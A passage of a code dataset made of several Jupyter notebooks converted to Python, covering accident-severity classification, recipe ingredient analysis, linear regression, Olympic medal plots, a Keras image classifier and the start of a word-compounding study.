cv_results.std())\n print(msg)\n\n# + _uuid=\"3d3921d521cf4e8675f21c9bf591855358002dc3\"\n# boxplot algorithm comparison\nfig = plt.figure()\nfig.suptitle('Algorithm Comparison')\nax = fig.add_subplot(111)\nplt.boxplot(results) \nax.set_xticklabels(names)\nplt.show()\n\n# + _uuid=\"8782f2725e7edd6338d7b8236d58a19dd978c805\"\nx_test = test_set_scaled\ny_test = le.fit_transform(test_set_labels)\ny_test\n\n# + _uuid=\"b2bcfd0c5a03fb3385fb2e06fc8514ff4428d53f\"\nmodels[0][1].fit(X_train, y_train)\n\nmodels[1][1].fit(X_train, y_train)\n\nmodels[2][1].fit(X_train, y_train)\n\n# + _uuid=\"ba790824c56a13717590876ec59484a2af8a4758\"\nfrom sklearn.metrics import balanced_accuracy_score\n\npredictions_LR = models[0][1].predict(x_test)\n# score1 = cohen_kappa_score(predictions_LR, y_test)\nscore1 = balanced_accuracy_score(predictions_LR, y_test)\nprint(\"Logistic Regression Test Accuracy:\",score1)\n\npredictions_RFC = models[1][1].predict(x_test)\n# score2 = cohen_kappa_score(predictions_RFC, y_test) \nscore2 = balanced_accuracy_score(predictions_RFC, y_test)\nprint(\"Random Forest Test Accuracy:\",score2)\n\npredictions_DTC = models[2][1].predict(x_test)\n# score3 = cohen_kappa_score(predictions_DTC, y_test) \nscore3 = balanced_accuracy_score(predictions_DTC, y_test)\nprint(\"Decision Tree Test Accuracy:\",score3)\n\n# + _uuid=\"de7ba9d8a17244484463d4b3808dacc329f27061\"\nimport seaborn as sns\nfrom sklearn import metrics\n\ncm_LR = metrics.confusion_matrix(y_test, predictions_LR)\nprint(cm_LR)\ncm_RFC = metrics.confusion_matrix(y_test, predictions_RFC)\nprint(cm_RFC)\ncm_DTC = metrics.confusion_matrix(y_test, predictions_DTC)\nprint(cm_DTC)\n\n# + _uuid=\"6e32f46b6a529ff712d4d2e8cbce1874617528d9\"\nplt.figure(figsize=(9,9))\nsns.heatmap(cm_LR, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r');\nplt.ylabel('Actual label');\nplt.xlabel('Predicted label');\nall_sample_title = 'Accuracy Score: {0}'.format(score1)\nplt.title(all_sample_title, size = 15);\n\n# + _uuid=\"792fde8192da1ce1f38c78bdc02d410c75b49cda\"\nplt.figure(figsize=(9,9))\nsns.heatmap(cm_RFC, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r');\nplt.ylabel('Actual label');\nplt.xlabel('Predicted label');\nall_sample_title = 'Accuracy Score: {0}'.format(score2)\nplt.title(all_sample_title, size = 15);\n\n# + _uuid=\"fa539e2c6b80affe1a6f0dba2eac922a2ac49cf4\"\nplt.figure(figsize=(9,9))\nsns.heatmap(cm_DTC, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r');\nplt.ylabel('Actual label');\nplt.xlabel('Predicted label');\nall_sample_title = 'Accuracy Score: {0}'.format(score3)\nplt.title(all_sample_title, size = 15);\n\n# + _uuid=\"196edd26a3a73320749003dff8d86d20e446480b\"\n\n\n# + _uuid=\"116917f5821194fad25083f40ad885e18a79cf1e\"\n# Grid Search\nfrom sklearn.model_selection import GridSearchCV\n\n\n# + _uuid=\"7a85aaa4bfa04627709cb8282ac3862fca09788b\"\nRFC = RandomForestClassifier(random_state=42)\n# bootstrap = [True,False]\n# max_depth = [70,80, 90, 100, 110,120, None]\nmax_features = ['log2','sqrt']\n# min_samples_leaf = [3, 4, 5]\n# min_samples_split = [2,10,50,100, 150]\n# n_estimators = [20,50,100, 200, 300]\nn_estimators = [200]\n\n# + _uuid=\"71baa0f58e56c1816b52c8b802e463d0eab24770\"\n# estimator = GridSearchCV(RFC,dict(#max_depth = max_depth,\\\n# max_features = max_features,\\\n# n_estimators = n_estimators),\\\n# cv = 10, scoring = 'accuracy', n_jobs = -1)\n\n# + _uuid=\"863fb39613ece8524aa66abd1eefa85eeb002ce0\"\n# import time\n# from sklearn.metrics import 
classification_report\n# start_time = time.time()\n# estimator.fit(X_train,y_train)\n# preds = estimator.predict(x_test)\n# # print(\"Total time of GridSearchCV and prediction:\" % (time.time() - start_time))\n# print(classification_report(y_test,preds))\n\n\n# + _uuid=\"e49d7f7b151acda1e9aec8f024a9acf227978302\"\n# # 'max_features': 'sqrt', 'n_estimators': 200}\n# estimator.best_params_\n\n# + _uuid=\"846874ae194f9377cb69a015377913c47ce8ddaa\"\n# from sklearn import linear_model\n# # Create logistic regression\n# logistic = linear_model.LogisticRegression()\n\n# # Create regularization penalty space\n# penalty = ['l2']\n\n# # Create regularization hyperparameter space\n# C = np.logspace(2, 4, 10)\n\n# # Create hyperparameter options\n# hyperparameters = dict(C=C, penalty=penalty, solver = ['newton-cg'],multi_class=['auto'])\n\n# clf_estimator = GridSearchCV(logistic, hyperparameters, cv=10, verbose=0)\n\n# + _uuid=\"8f6f077855d8f41adba4a14d1ea661b2744115f5\"\n# clf_estimator.fit(X_train,y_train)\n# preds = clf_estimator.predict(x_test)\n# # print(\"Total time of GridSearchCV and prediction:\" % (time.time() - start_time))\n# print(classification_report(y_test,preds))\n\n# + _uuid=\"dc37f83266e47fcb5ccba29a44a9a8e8501977ac\"\n# clf_estimator.best_params_\n\n# + _uuid=\"0178279920544dff5f4963218d0844107567ae6a\"\nLR = LogisticRegression(C = 774,multi_class = 'auto', penalty = 'l2', solver = 'newton-cg')\nLR.fit(X_train, y_train)\n\n# + _uuid=\"6b978d59cb7e1e0fed4d30c15f3169c0a5354578\"\nfrom sklearn.metrics import accuracy_score\n\npredictions_LR = LR.predict(x_test)\nacc = balanced_accuracy_score(predictions_LR, y_test) \nprint(\"Logistic Regression Test Accuracy:\",acc)\nprint()\ncm_LR = metrics.confusion_matrix(y_test, predictions_LR)\nprint(cm_LR)\n\nplt.figure(figsize=(9,9))\nsns.heatmap(cm_LR, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r')\n\n\n\n# + _uuid=\"2de81e89363d3cc0d95de2365ebdb44c753a1f7e\"\nX_train[:5]\n\n# + _uuid=\"add50e1a5dca5521884b5e18e7b538307f5e3053\"\ntest_set2 = X\n\ntest_set2_labels = test_set2[\"Accident_Severity\"].copy()\ntest_set2 = test_set2.drop(\"Accident_Severity\", axis=1)\n\ny_test2 = le.fit_transform(test_set2_labels)\n\n\n# + _uuid=\"e57015d0c823f48b6b35f34326088954f8d9969a\"\ntest_set2 = scaler.transform(test_set2)\n\n# + _uuid=\"62beddd140786408e77a8b424da8625f92c14618\"\ntest_set2.shape\n\n# + _uuid=\"406b0256a6a4e00008638cabf0f751625b6d60c6\"\npredictions2_LR = LR.predict(test_set2)\n\nacc = balanced_accuracy_score(predictions2_LR, y_test2)\n# acc = cohen_kappa_score(predictions2_LR, y_test2)\nprint(\"Logistic Regression Test Accuracy:\",acc)\nprint()\ncm_LR = metrics.confusion_matrix(y_test2, predictions2_LR)\nprint(cm_LR)\n\nplt.figure(figsize=(9,9))\nsns.heatmap(cm_LR, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r')\nplt.ylabel('Actual label');\nplt.xlabel('Predicted label');\n\n\n# + _uuid=\"1e60d53714bd03ddf17644f57da34aa1b759e7f3\"\n# Balanced Random Forest Classifier\n\nfrom imblearn.ensemble import BalancedRandomForestClassifier\n\nBRFC = BalancedRandomForestClassifier(random_state=42)\n\n\nfrom sklearn.model_selection import train_test_split\nX2_train, X2_test = train_test_split(X2, test_size=0.2, random_state=42)\n\nfrom sklearn.preprocessing import LabelEncoder\nle = LabelEncoder()\n\n# Separate labels from the rest of the dataset\nX2_train_labels = X2_train[\"Accident_Severity\"].copy()\nX2_train = X2_train.drop(\"Accident_Severity\", axis=1)\n\nX2_test_labels = 
X2_test[\"Accident_Severity\"].copy()\nX2_test = X2_test.drop(\"Accident_Severity\", axis=1)\n\nX2_train_labels = le.fit_transform(X2_train_labels)\nX2_test_labels = le.fit_transform(X2_test_labels)\n\n\nfrom sklearn.preprocessing import MinMaxScaler as Scaler\n\nscaler = Scaler()\nscaler.fit(X2_train)\n\nX2_train_scaled = scaler.transform(X2_train)\nX2_test_scaled = scaler.transform(X2_test)\n\n\n\nBRFC.fit(X2_train_scaled, X2_train_labels)\n\n\n\n\n\n# + _uuid=\"b6097987d364419467aa9fef4483aa760940e0f8\"\npredictions2_BRFC = BRFC.predict(X2_test_scaled)\n\nacc = balanced_accuracy_score(predictions2_BRFC, X2_test_labels)\n# acc = cohen_kappa_score(predictions2_BRFC, X2_test_labels)\nprint(\"BRFC:\",acc)\nprint()\ncm_BRFC = metrics.confusion_matrix(X2_test_labels, predictions2_BRFC)\nprint(cm_BRFC)\n\nplt.figure(figsize=(9,9))\nsns.heatmap(cm_BRFC, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r')\nplt.ylabel('Actual label');\nplt.xlabel('Predicted label');\n\n# + _uuid=\"566a8d9e619f4d836bf6500971403c3c9d8b5e1c\"\n# Easy Ensemble Classifier\n\nfrom imblearn.ensemble import EasyEnsembleClassifier\n\nEEC = EasyEnsembleClassifier(random_state=42)\n\n\n# from sklearn.model_selection import train_test_split\n# X2_train, X2_test = train_test_split(X2, test_size=0.2, random_state=42)\n\n# from sklearn.preprocessing import LabelEncoder\n# le = LabelEncoder()\n\n# # Separate labels from the rest of the dataset\n# X2_train_labels = X2_train[\"Accident_Severity\"].copy()\n# X2_train = X2_train.drop(\"Accident_Severity\", axis=1)\n\n# X2_test_labels = X2_test[\"Accident_Severity\"].copy()\n# X2_test = X2_test.drop(\"Accident_Severity\", axis=1)\n\n# X2_train_labels = le.fit_transform(X2_train_labels)\n# X2_test_labels = le.fit_transform(X2_test_labels)\n\n\n# from sklearn.preprocessing import MinMaxScaler as Scaler\n\n# scaler = Scaler()\n# scaler.fit(X2_train)\n\n# X2_train_scaled = scaler.transform(X2_train)\n# X2_test_scaled = scaler.transform(X2_test)\n\n\n\nEEC.fit(X2_train_scaled, X2_train_labels)\n\n\n\n# + _uuid=\"34d7a319bbbb6dcfa9fa71145381c34e5e98508e\"\npredictions2_EEC = EEC.predict(X2_test_scaled)\n\nacc = balanced_accuracy_score(predictions2_EEC, X2_test_labels)\n# acc = cohen_kappa_score(predictions2_BRFC, X2_test_labels)\nprint(\"EEC:\",acc)\nprint()\ncm_EEC = metrics.confusion_matrix(X2_test_labels, predictions2_EEC)\nprint(cm_EEC)\n\nplt.figure(figsize=(9,9))\nsns.heatmap(cm_EEC, annot=True, fmt=\".3f\", linewidths=.5, square = True, cmap = 'Blues_r')\nplt.ylabel('Actual label');\nplt.xlabel('Predicted label');\n\n# + _uuid=\"452827475ca301e38d64b2ec5430dc6a23f9506c\"\n\n","repo_name":"Eridanous/Data-Mining","sub_path":"dataminingproject.ipynb","file_name":"dataminingproject.ipynb","file_ext":"py","file_size_in_byte":26779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"39488740604","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport re\n\n# +\n# Read in the cuisine_ingredients csv file\ncolumn_names = [\"cuisine\", \"recipe\", \"ingredients\", \"full_ingredients\", \"image_url\"]\ndf = pd.read_csv(\"cuisine_ingredients.csv\", names=column_names, encoding='utf-16')\n\n# Overview of the dataset\ndf.sample(20, random_state=1)\n# -\n\ndf.info()\n\n# There are 4724 rows in the dataset. 
At a glance, there are no null values in cuisine, recipe, ingredients, and full_ingredients columns, while there are quite a few null values in the image_url column.\n\n# Drop duplicated rows if any\ndf.drop_duplicates(inplace=True)\ndf.shape\n\n# There are no duplicated rows.\n\n# Check uniqueness of each column's values\nfor col in df.columns:\n print(col, \"is unique:\", df[col].is_unique)\n\n# It appears that one recipe name can have different sets of full ingredients.\n\n# > When web-scraping the data, I've decided to scrape both streamlined ingredients (with green-highlighted hyperlinks to the ingredients' sites) and the full ingredient list (with the quantity of each ingredient and sometimes with some simple preparation steps) as illustrated in the below image. The full ingredient list will be more comprehensive but require more cleaning. To check which feature (ingredients vs. full_ingredients) should be used for the Natural Language Processing pipeline, we'll do some EDA on these variables like checking minimum and maximum numbers of characters in column ingredients to identify any outlier.\n\n# ![screenshot-ingredients.png](attachment:screenshot-ingredients.png)\n#
(Image source: https://www.bbc.co.uk/food/recipes/californian_sourdough_59703)
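\n\n# > Side note (an illustrative sketch, not part of the original analysis): since the scraped ingredient columns hold stringified Python lists, `ast.literal_eval` may be a more robust way to recover individual ingredients than splitting on quote/comma patterns, assuming the stored values are well-formed list literals. The helper name below is hypothetical; its regex fallback simply mirrors the `re.split` pattern used later in this notebook.\n\n# +\nimport ast\nimport re\n\n\ndef parse_ingredient_list(raw):\n    \"\"\"Parse one stringified ingredient list; fall back to the regex split for malformed rows.\"\"\"\n    try:\n        return ast.literal_eval(raw)\n    except (ValueError, SyntaxError):\n        return re.split(\"\\', | \\\",\", raw)\n\n\n# Example on a well-formed value; the same helper could be applied column-wise,\n# e.g. df.full_ingredients.apply(parse_ingredient_list).apply(len)\nparse_ingredient_list(\"['flour', 'water', 'salt']\")\n# -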
\n\n# Snapshot of some ingredient text\ndf.full_ingredients.sample(20, random_state=2)\n\n# At glance, each ingredient for a recipe in the full_ingredients column can be splitted by `',`. We can't simply split by `,` because an ingredient can be accompanied by some preparation steps also seperated by `,`. Additionally, due to the nature of text, either `'` or `\"` can exist within one ingredient text. Hence, either `\"` or `'` can be used to wrap around an ingredient text to seperate it from another in the ingredient list. To overcome this, I'll apply some regular expression operations to seperate individual ingredients.\n\n# +\n# Check the max and min number of ingredients of a recipe in the \"ingredients\" column\n\ningredient_check = df.ingredients.apply(lambda x: re.split(\"\\', | \\\",\", x)).apply(len)\nprint(f\"Maximum number of ingredients in the 'ingredients' column in a recipe: {ingredient_check.max()}\")\nprint(f\"Minimum number of ingredients in the 'ingredients' column in a recipe: {ingredient_check.min()}\")\n\n# +\n# Check the max and min number of ingredients of a recipe in the \"full_ingredients\" column\n\nfull_ingredients_check = df.full_ingredients.apply(lambda x: re.split(\"\\', | \\\",\", x)).apply(len)\nprint(f\"Maximum number of ingredients in the 'full_ingredients' column in a recipe: {full_ingredients_check.max()}\")\nprint(f\"Minimum number of ingredients in the 'full_ingredients' column in a recipe: {full_ingredients_check.min()}\")\n# -\n\n# It seems rare that a recipe has only one ingredient. Let's visualise the number of ingredients distribution in both the \"ingredients\" and \"full_ingredients\" columns.\n\nplt.figure(figsize=(8,6))\nsns.kdeplot(ingredient_check)\nplt.title('Distribution of number of ingredients in the \"ingredients\" column')\nplt.xlabel('Number of ingredients')\nplt.ylabel('Density')\nplt.show()\ningredient_check.describe()\n\nplt.figure(figsize=(8,6))\nsns.kdeplot(full_ingredients_check)\nplt.title('Distribution of number of ingredients in the \"full_ingredients\" column')\nplt.xlabel('Number of ingredients')\nplt.ylabel('Density')\nplt.show()\nfull_ingredients_check.describe()\n\n# The distributions of the number of ingredients between the columns are quite synced. Both are skewed right and unimodal. Most recipes have about 10 ingredients. To examine the possible outliers, we'll investigate recipes with less than 3 ingredients or more than 45 ingredients in either the \"ingredients\" column or the \"full_ingredients\" column.\n\ndf[(ingredient_check < 3) | (ingredient_check > 45) | (full_ingredients_check > 45) | (\n full_ingredients_check < 3)][[\"cuisine\", \"recipe\", \"ingredients\", \"full_ingredients\"]]\n\n# A closer look tells me that there are some inconsistencies between the number of ingredients in the \"ingredients\" column vs \"full_ingredients\" column of the same recipe. There is also a blank value `[]` in the \"ingredients\" overlooked in the previous step. 
We'll calculate the differences and plot their distribution.\n\nnum_ingredients_difference = full_ingredients_check - ingredient_check\nplt.figure(figsize=(8, 6))\nsns.kdeplot(num_ingredients_difference)\nplt.title('Distribution of differences between numbers of ingredients in the \"full_ingredients\" and \"ingredients\" column')\nplt.xlabel('Number of ingredients in difference')\nplt.ylabel('Density')\nplt.show()\nnum_ingredients_difference.describe()\n\n# Less than 80% of the recipes have no difference between the number of ingredients between the \"ingredients\" column and \"full_ingredients\". The remaining 20% are considered significant given our dataset size is not very big. Hence, we'll use the \"full_ingredients\" column for the NLP pipeline, though this feature will need more text cleaning.\n\n# Transform cuisine and ingredients into a seperate table\ndf[[\"cuisine\", \"recipe\", \"full_ingredients\"]].to_csv(\"cuisine_full_ingredients.csv\", index=False)\n\n\n","repo_name":"momcancode/Cuisine-Demystifier-NLP-ML-Project","sub_path":"data/01_transform_bbcfood_cuisine.ipynb","file_name":"01_transform_bbcfood_cuisine.ipynb","file_ext":"py","file_size_in_byte":5562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"32"} +{"seq_id":"29017326877","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom sklearn.linear_model import LinearRegression\n\ndf=pd.read_csv(r\"C:\\Users\\adith\\OneDrive\\Desktop\\Adithya\\My Projects\\Linear Reg\\Advertising.csv\")\ndf\n\nx=df['TV'].values.reshape(-1,1)\ny=df['Sales'].values.reshape(-1,1)\ny\n\nlin=LinearRegression()\nlin.fit(x,y)\nPred_y=lin.predict(x)\nPred_y\n\nnp.concatenate((y,Pred_y),axis=1)\n\n# #### MAE- This measures absolute averege distance between real data and predicted data \n# #### MSE-This measures squared average distance between real data and predicted data\n\n((y-Pred_y)**2).mean() #MSE\n\nnp.abs(y-Pred_y).mean() #MAE\n\nfrom sklearn import metrics\nprint(metrics.mean_absolute_error(y,Pred_y))\nprint(metrics.mean_squared_error(y,Pred_y))\n\nplt.scatter(x,y)\nplt.plot(x,lin.predict(x))\n","repo_name":"AdithyaChalla12/ML","sub_path":"Regression/LR1 (1).ipynb","file_name":"LR1 (1).ipynb","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"14498963792","text":"# En un histograma, visualizar el GDP per Capita de cada país. Bonus: ordenar el histograma en orden decreciente.\n#\n\nimport pandas as pandas\nDF = pandas.read_csv('summer.csv', sep=\",\")\nDF[::]\n\nDFWinter=pandas.read_csv('winter.csv',sep = ',')\nDFWinter[::]\n\nDFDictionary=pandas.read_csv('dictionary.csv',sep = ',')\nDFDictionary[::]\n\n\nimport matplotlib.pyplot as plot\n\nDFDictionary['GDP per Capita'].plot(kind='bar')\nplot.show()\n\n# ¿Cuál es el número de medalla por cada país, sin diferenciar el tipo de medalla, en los juegos de verano? Visualizar en un histograma.\n#\n\n# +\n\nNewDF= DF.groupby('Country')['Medal'].count().plot(kind='bar')\nplot.show()\n\n\n# -\n\n# ¿Cuál es el número de medalla por cada país, diferenciando el color de la medalla, en los juegos de verano? 
Visualizar en un histograma.\n\nDForo=DF.loc[DF['Medal'] == 'Gold']\nDForo[::]\nDForo.groupby('Country')['Medal'].count().plot(kind='bar')\nplot.show()\n\n\nDForo=DF.loc[DF['Medal'] == 'Silver']\nDForo.groupby('Country')['Medal'].count().plot(kind='bar',color='g')\nplot.show()\n\nDFbronze=DF.loc[DF['Medal'] == 'Bronze']\nDFbronze.groupby('Country')['Medal'].count().plot(kind='bar', color='b')\nDFsilver=DF.loc[DF['Medal'] == 'Silver']\nDFsilver.groupby('Country')['Medal'].count().plot(kind='bar',color='g')\nDForo=DF.loc[DF['Medal'] == 'Gold']\nDForo.groupby('Country')['Medal'].count().plot(kind='bar',color='Y')\nplot.show()\n\nplot.rcParams['figure.figsize'] = (25, 15)\n\nDForo.groupby('Country')['Medal'].count()\n\n\n# ¿Cuál es el número de medalla por cada país, diferenciando el color de la medalla, en los juegos de verano y invierno? Visualizar en un mismo histograma\n\nhole=DFWinter\n\nhole\n\n\n","repo_name":"felipeOyarzun/Taller_Base_datos","sub_path":"Prueba Felipe Oyarzun.ipynb","file_name":"Prueba Felipe Oyarzun.ipynb","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"5710405445","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + id=\"aYqcFyExrWbo\"\n\n\n# + id=\"H215ikbNVVZS\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"98ffeccb-58d6-4795-f62c-87707e048611\"\n# cd /content/drive/MyDrive/Colab Notebooks/dataset\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"z7VB1d4wVdov\" outputId=\"463707c9-01a1-4cc8-edda-193e787dd7b5\"\n# ls\n\n# + id=\"5IGm26ZzVGBs\"\n# import the necessary packages\nfrom keras.models import Sequential\nfrom keras.layers.core import Activation\nfrom keras.layers.core import Flatten\nfrom keras.layers.core import Dense\nfrom keras.optimizers import Adam\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom PIL import Image\nfrom imutils import paths\nimport numpy as np\nimport os\n\n# + id=\"0-5PXYTsVGBw\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"623f3782-24b2-4ce0-8af1-e595559a443c\"\nprint(\"[INFO] loading images...\")\nimagePaths1 = paths.list_images(\"GMB_01\")\nimagePaths2 = paths.list_images(\"GMB_03\")\nimagePaths3 = paths.list_images(\"GMB_07\")\nimagePaths4 = paths.list_images(\"GMB_08\")\nimagePaths5 = paths.list_images(\"GMB_09\")\ndata = []\nlabels = []\n\n# + id=\"9Q-KXSsGVGB0\"\nfor imagePath in imagePaths1:\n image = Image.open(imagePath)\n image = np.array(image.resize((168, 168))) / 255.0 #normalisasi\n data.append(image)\n\n label = imagePath.split(os.path.sep)[-2]\n labels.append(label)\nfor imagePath in imagePaths2:\n image = Image.open(imagePath)\n image = np.array(image.resize((168, 168))) / 255.0 #normalisasi\n data.append(image)\n\n label = imagePath.split(os.path.sep)[-2]\n labels.append(label)\nfor imagePath in imagePaths3:\n image = Image.open(imagePath)\n image = np.array(image.resize((168, 168))) / 255.0 #normalisasi\n data.append(image)\n\n label = imagePath.split(os.path.sep)[-2]\n labels.append(label)\nfor imagePath in imagePaths4:\n image = Image.open(imagePath)\n image = np.array(image.resize((168, 168))) / 255.0 #normalisasi\n data.append(image)\n\n label = imagePath.split(os.path.sep)[-2]\n labels.append(label)\nfor imagePath in imagePaths5:\n image = Image.open(imagePath)\n image = np.array(image.resize((168, 168))) / 255.0 
#normalisasi\n data.append(image)\n\n label = imagePath.split(os.path.sep)[-2]\n labels.append(label)\n\n# + id=\"Rzbolh88VGB2\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"3eb5aa0c-bced-49d0-ab1e-5150fd0cd81e\"\nprint(labels)\n\n# + id=\"twd1IeuKVGB5\"\n# encode the labels, converting them from strings to integers\nlb = LabelBinarizer()\nlabels = lb.fit_transform(labels)\n\n# + id=\"5FPCyIqcVGB7\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"d963acc9-3281-460d-e54e-3f15cee451b8\"\nprint(labels)\n\n# + id=\"ktZ5hNYwVGB9\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"372a158c-59fe-4a2f-d1bc-3e8208286765\"\n# perform a training and testing split, using 75% of the data for\n# training and 25% for evaluation\n(trainX, testX, trainY, testY) = train_test_split(np.array(data),\tnp.array(labels), test_size=0.25, shuffle=True)\nprint(trainX.shape)\nprint(testX.shape)\n\n# + id=\"MSxR7GLQvrUP\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"e0ae78d5-32bf-49cb-b43d-8857bb60f059\"\nfrom keras.layers import Convolution2D, MaxPool2D\nfrom keras.models import Sequential\nfrom keras.layers.core import Flatten, Dense\n\nmodel1 = Sequential()\nmodel1.add(Convolution2D(8, (3,3), activation='relu', input_shape=(168,168,3)))\nmodel1.add(MaxPool2D(2,2))\nmodel1.add(Convolution2D(16, (3,3), activation='relu'))\nmodel1.add(MaxPool2D(2,2))\n#fully connected layer\nmodel1.add(Flatten())\nmodel1.add(Dense(100, activation='relu'))\nmodel1.add(Dense(5, activation='softmax'))\n\nmodel1.summary()\n\n# + id=\"ggcSdj_aVGCB\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"91b78c20-8637-4bab-d071-efc9f1907c53\"\n# train the model using the Adam optimizer\nprint(\"[INFO] training network...\")\nopt = Adam(lr=1e-3, decay=1e-3 / 50)\nmodel1.compile(loss=\"categorical_crossentropy\", optimizer=opt, metrics=[\"accuracy\"])\n\n# + id=\"3bbMakb0w-XZ\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"2b106afc-7b68-4302-b9df-2254ee4f49f9\"\nH = model1.fit(trainX, trainY, validation_data=(testX, testY), epochs=30, batch_size=32)\n\n# + id=\"98_oXi-lcgux\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 592} outputId=\"b8d5fde6-441b-4eea-f6b3-be9e5ab3983b\"\nimport matplotlib.pyplot as plt\n\nprint(H.history.keys())\n# summarize history for accuracy\nplt.plot(H.history['accuracy'])\nplt.plot(H.history['val_accuracy'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n# summarize history for loss\nplt.plot(H.history['loss'])\nplt.plot(H.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n# + id=\"lPAZkmBJVGCD\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"0d16df04-ae27-4b41-9ebe-a32c42aa8ffe\"\n# evaluate the network\nprint(\"[INFO] evaluating network...\")\npredictions = model1.predict(testX, batch_size=32)\nprint(classification_report(testY.argmax(axis=1),\n\tpredictions.argmax(axis=1), target_names=lb.classes_))\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"NQcNvdOeAQTt\" outputId=\"7cce4a5b-2136-4d4a-a0f8-ef4a7c0de8b4\"\n# cd /content/drive/MyDrive/Colab Notebooks/\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"wMdUR2iEAX_i\" outputId=\"f97d9faf-1fe4-4b42-a5e5-b25efe79641d\"\n# ls\n\n# + id=\"4uBcj8x8iwTw\" colab={\"base_uri\": \"https://localhost:8080/\"} 
outputId=\"e02c71fe-4ef1-4cbd-fca0-29dee1f8bca0\"\nmodel1.save('nnmodel_scene')\n\n# + id=\"AOwJT2jLVGCN\"\nimport cv2\nimport matplotlib.pyplot as plt\nimage1='daun.jpg'\n\n# + id=\"PkM68K4GVGCP\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 288} outputId=\"9ffb1965-abb1-4a14-9dba-810603fc15d1\"\nimg_array = cv2.imread(image1)\nprint(type(img_array))\nplt.imshow(img_array)\nplt.show()\n\n\n# + id=\"1ZkNY8LWVGCR\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"788ff09d-58d7-4635-99d6-2f462a660722\"\nimage_testing = Image.open('daun.jpg')\nimage_testing = np.array(image_testing.resize((168, 168))) / 255.0\nimage_testing.shape\n\n# + id=\"qL66nfOcVGCT\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"ff759259-2f8f-4f2c-cb91-4f1cc1a1f8fe\"\nimage_testing = np.expand_dims(image_testing, axis=0)\nprint(image_testing.shape)\n\n# + id=\"vTy9yP1AVGCV\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"5ba74645-fccc-4511-87c5-7571546f8ff6\"\noutput = model1.predict(image_testing, 1)\nprint(output)\nprint(lb.classes_[output.argmax(axis=1)])\n","repo_name":"aldiidf/TUGASPYTHON11","sub_path":"TUGASPYTHONALDIDF.ipynb","file_name":"TUGASPYTHONALDIDF.ipynb","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"37"} +{"seq_id":"40535078203","text":"# +\nimport pandas as pd\nimport numpy as np\nfrom nltk.stem import WordNetLemmatizer\nlemmatizer = WordNetLemmatizer()\npd.options.display.float_format = '{:,.3f}'.format\n\npd.options.mode.chained_assignment = None\nimport seaborn as sns\n# %matplotlib inline\nsns.set(style=\"whitegrid\", font_scale = 2.5)\nsns.set_context(rc={\"lines.markersize\": 17, \"lines.linewidth\": 2})\n\nuse_pgf = False\nimport matplotlib\nimport matplotlib.ticker as ticker\nif use_pgf:\n matplotlib.use(\"pgf\")\n matplotlib.rcParams.update({\n \"pgf.texsystem\": \"pdflatex\",\n 'font.family': 'serif',\n 'text.usetex': True,\n 'pgf.rcfonts': False,\n })\n\nimport pickle as pkl\nfrom matplotlib import pyplot as plt\nplt.rcParams.update({'figure.max_open_warning': 0})\n\nfrom scipy.stats.stats import pearsonr\nfrom scipy.stats.stats import pearsonr\n\nfrom functools import reduce\n# -\n\nplotdir = \"../Plots/coha_new/\"\ncutoff = 100\ntimespan = 20\ndimension = 300\n#tagged = \"Tagged\"\ntagged = \"UnTagged\"\nppmi_preprocess = \"PPMI\"\n#ppmi_preprocess = \"RAW\"\nmedianImpute = \"med\"\n#medianImpute = \"na\"\n#mode = \"CompoundAware\"\nmode = \"CompoundAgnostic\"\n#mode = \"Setting\"\nnew_plot_col=list(range(1820,2010,timespan))\nfeaturefile = \"../../../Compounding/datasets/features_new/features_{}_{}_{}_{}_{}_{}.csv\".format(mode, ppmi_preprocess, tagged, timespan, cutoff, medianImpute)\n#compoundfile = \"../../../Compounding/datasets/features_new/compounds_{}_{}_{}_{}.csv\".format(mode, ppmi_preprocess, timespan, cutoff, dimension)\ncompoundfile = \"../../../Compounding/datasets/compounds.pkl\"\n#constituentsfile = \"../../../Compounding/datasets/features_new/constituents_CompoundAgnostic_{}_{}_{}.csv\".format(timespan, cutoff, 